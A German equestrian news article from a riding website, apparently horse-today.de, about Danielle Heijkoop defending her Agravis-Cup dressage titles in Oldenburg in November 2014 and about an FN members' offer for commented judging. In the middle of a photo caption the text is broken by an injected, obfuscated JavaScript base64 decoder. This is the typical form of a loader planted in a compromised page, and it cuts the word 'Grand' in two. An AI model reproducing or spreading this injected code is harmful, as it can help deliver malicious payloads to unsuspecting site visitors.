Agravis-Cup: Titelverteidigerin piaffiert erneut in Oldenburg

13. Oktober 2014 | Von Redaktion | Kategorie: Dressursport

[Oldenburg (GER)/L. Riedel]. Danielle Heijkoop, Ausnahmetalent aus den Niederlanden, gewann im vergangenen Jahr sowohl im Grand Prix, als auch im Grand Prix Special vor Altmeister Hubertus Schmidt beim Agravis-Cup und wird nun erneut als Titelverteidigerin vom 14. bis 16. November 2014 in Oldenburg an den Start gehen.

Danielle Heijkoop und Kingsley Siro als Erstplatzierte im Gr<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Prix bei den Oldenburger Pferdetagen 2013 (Foto: sportfotos-lafrentz.de)." width="200" height="300" />

Nach ihrem siegreichen Auftritt gingen auch die letzten 12 Monate genauso erfolgreich weiter. Im März gewann Danielle Heijkoop die Grand Prix Kür beim Meggle Preis in Dortmund. Beim Weltcup-Finale in Lyon erreichte sie Platz sechs in der Kür und Platz sieben im Grand Prix. Mittlerweile befindet sie sich mit ihrem Erfolgspferd Kingsley Siro N.O.P. auf Rang 11 der Weltrangliste.

Die Ausbilderin für Pferd und Reiter trainiert bei der mehrfachen Olympiasiegerin, Welt- und Europameisterin sowie 13-fachen Niederländischen Meisterin Anky van Grunsven. 2013 gewann sie als damalige Championats-Debütantin auf Anhieb die Mannschafts-Silbermedaille bei den Europameisterschaften im dänischen Herning. In diesem Jahr war sie eigentlich für den Einsatz bei den Weltreiterspielen nominiert, konnte jedoch verletzungsbedingt nicht an den Start gehen. Ihr Gribaldi-Sohn hatte sich beim Training „selbst etwas angeschlagen“ und war somit nicht einsatzbereit.

Für die Persönlichen Mitglieder der FN gibt es beim diesjährigen Agravis-Cup ein ganz besonderes Angebot. Der Reitmeister Johann Hinnemann kommentiert den Grand Prix de Dressage am Freitag, bzw. Grand Prix Spécial am Samstag. Nach dem Motto „Dressur transparent – was der Richter sehen will“ gibt er Hintergrundinformationen zwischen und während der Vorstellungen der Pferde. Die Teilnehmer werden dafür mit Funkempfängern ausgestattet. Im Teilnahmebeitrag sind die Ganztageskarten und Logensitzplätze sowie ein Sektempfang und die Ausstattung mit Funkempfängern bereits enthalten. Die Teilnehmerzahl ist begrenzt.

www.agravis-cup.de

Tags: , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=125057

Hier klicken, um einen Kommentar zu schreiben